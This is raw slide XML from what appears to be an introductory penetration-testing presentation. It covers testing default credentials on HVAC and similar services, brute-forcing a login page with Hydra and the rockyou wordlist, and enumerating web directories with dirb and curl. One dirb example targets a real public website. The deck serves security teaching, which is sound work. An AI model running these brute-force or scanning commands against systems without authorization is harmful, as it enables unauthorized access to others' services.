            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="6221016"/>
            <a:ext cx="7556421" cy="453509"/>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Modbus</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="6753820"/>
            <a:ext cx="7556421" cy="453509"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" lvl="1" marL="6858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BACnet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44629"/>
            <a:ext cx="7811810" cy="708779"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="5550"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4450" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="151617"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Black" pitchFamily="34" charset="0"/>
                <a:ea typeface="Montserrat Black" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Montserrat Black" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>2b. Test Weak Credentials:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4450" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="212038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Default Logins</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="2701528"/>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Often times services will have weak credentials for things like HVAC.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="3631406"/>
            <a:ext cx="3978116"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Logins such as </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="4198382"/>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"user"/"admin" </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="4640580"/>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"admin"/"password" </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="5082778"/>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"root"/"password"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="5524976"/>
            <a:ext cx="3978116"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151617"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata" pitchFamily="34" charset="0"/>
                <a:ea typeface="Inconsolata" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Inconsolata" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="6091952"/>
            <a:ext cx="3978116" cy="362903"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="non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are very common. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5332928" y="212038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151617"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Black" pitchFamily="34" charset="0"/>
                <a:ea typeface="Montserrat Black" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Montserrat Black" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Automation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5332928" y="2701528"/>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There are many tools for credential brute forcing, but common ones include JTR and Hydra. An example Hydra prompt would be:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Shape 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5332928" y="4408289"/>
            <a:ext cx="3978116" cy="1065848"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 858"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EBDFD7"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Shape 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5321618" y="4408289"/>
            <a:ext cx="4000738" cy="1065848"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3192"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EBDFD7"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5548432" y="4578310"/>
            <a:ext cx="3547110" cy="725805"/>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highlight>
                  <a:srgbClr val="EBDFD7"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>hydra -l admin -P rockyou.txt 192.168.0.10 http-get /login</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Text 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5332928" y="5729288"/>
            <a:ext cx="3978116" cy="1451610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2850"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1750" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="151617"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata" pitchFamily="34" charset="0"/>
                <a:ea typeface="Inconsolata" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Inconsolata" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>This command uses username "admin" and tries passwords from the rockyou text file on http://192.168.0.10/login </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Image 0" descr="preencoded.png">    </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9872067" y="2148721"/>
            <a:ext cx="3978116" cy="265199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60095" y="597218"/>
            <a:ext cx="9923621" cy="678656"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="5300"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4250" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="151617"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Black" pitchFamily="34" charset="0"/>
                <a:ea typeface="Montserrat Black" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Montserrat Black" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>2c. Look for Vulnerable Directories:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="760095" y="1710214"/>
            <a:ext cx="13110210" cy="347424"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2700"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="151617"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata" pitchFamily="34" charset="0"/>
                <a:ea typeface="Inconsolata" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Inconsolata" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Sometimes even if vulnerable services aren't open, there will be some kind of directory traversal possible. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="760095" y="2519124"/>
            <a:ext cx="2714625" cy="339328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>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Dirb</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="760095" y="3075623"/>
            <a:ext cx="6290191" cy="347424"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2700"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="151617"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata" pitchFamily="34" charset="0"/>
                <a:ea typeface="Inconsolata" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Inconsolata" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Using </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Shape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="760095" y="3667363"/>
            <a:ext cx="6290191" cy="673179"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1358"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EBDFD7"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Shape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="749260" y="3667363"/>
            <a:ext cx="6311860" cy="673179"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4839"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EBDFD7"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="966430" y="3830241"/>
            <a:ext cx="5877520" cy="347424"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2700"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="151617"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EBDFD7"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>dirb http://192.168.0.10</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="760095" y="4584859"/>
            <a:ext cx="6290191" cy="694849"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2700"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="151617"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata" pitchFamily="34" charset="0"/>
                <a:ea typeface="Inconsolata" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Inconsolata" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>or similar, a user can enumerate all online paths related on that service.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="760095" y="5475089"/>
            <a:ext cx="6290191" cy="694849"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2700"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="151617"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata" pitchFamily="34" charset="0"/>
                <a:ea typeface="Inconsolata" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Inconsolata" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>F.e., dirb </a:t>
            </a:r>
            <a:pPr algn="l" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2700"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="151617"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata" pitchFamily="34" charset="0"/>
                <a:ea typeface="Inconsolata" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Inconsolata"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https://www.openai.com/</a:t>
            </a:r>
            <a:pPr algn="l" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2700"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="151617"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata" pitchFamily="34" charset="0"/>
                <a:ea typeface="Inconsolata" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Inconsolata" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t> would return something like:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="760095" y="6365319"/>
            <a:ext cx="6290191" cy="34742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151617"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata" pitchFamily="34" charset="0"/>
                <a:ea typeface="Inconsolata" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Inconsolata" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>/news</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="760095" y="6788706"/>
            <a:ext cx="6290191" cy="34742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151617"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata" pitchFamily="34" charset="0"/>
                <a:ea typeface="Inconsolata" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Inconsolata" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>/safety</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="760095" y="7212092"/>
            <a:ext cx="6290191" cy="34742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151617"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata" pitchFamily="34" charset="0"/>
                <a:ea typeface="Inconsolata" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Inconsolata" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7587734" y="2519124"/>
            <a:ext cx="2714625" cy="339328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2650"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="151617"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Black" pitchFamily="34" charset="0"/>
                <a:ea typeface="Montserrat Black" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Montserrat Black" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Manual testing:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7587734" y="3075623"/>
            <a:ext cx="6290191" cy="694849"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2700"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="151617"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata" pitchFamily="34" charset="0"/>
                <a:ea typeface="Inconsolata" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Inconsolata" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>There will sometimes be vulnerability that can be quickly manually tested. Common checks include:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Text 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7587734" y="3965853"/>
            <a:ext cx="6290191" cy="34742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151617"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata" pitchFamily="34" charset="0"/>
                <a:ea typeface="Inconsolata" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Inconsolata" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>/robots.txt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Text 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7587734" y="4389239"/>
            <a:ext cx="6290191" cy="694849"/>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151617"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata" pitchFamily="34" charset="0"/>
                <a:ea typeface="Inconsolata" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Inconsolata" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Using curl to try to manually traverse hidden directories on a website:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Shape 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7587734" y="5328404"/>
            <a:ext cx="6290191" cy="673179"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1358"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EBDFD7"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Shape 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7576899" y="5328404"/>
            <a:ext cx="6311860" cy="673179"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4839"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EBDFD7"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Text 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7794069" y="5491282"/>
            <a:ext cx="5877520" cy="347424"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2700"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="151617"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EBDFD7"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
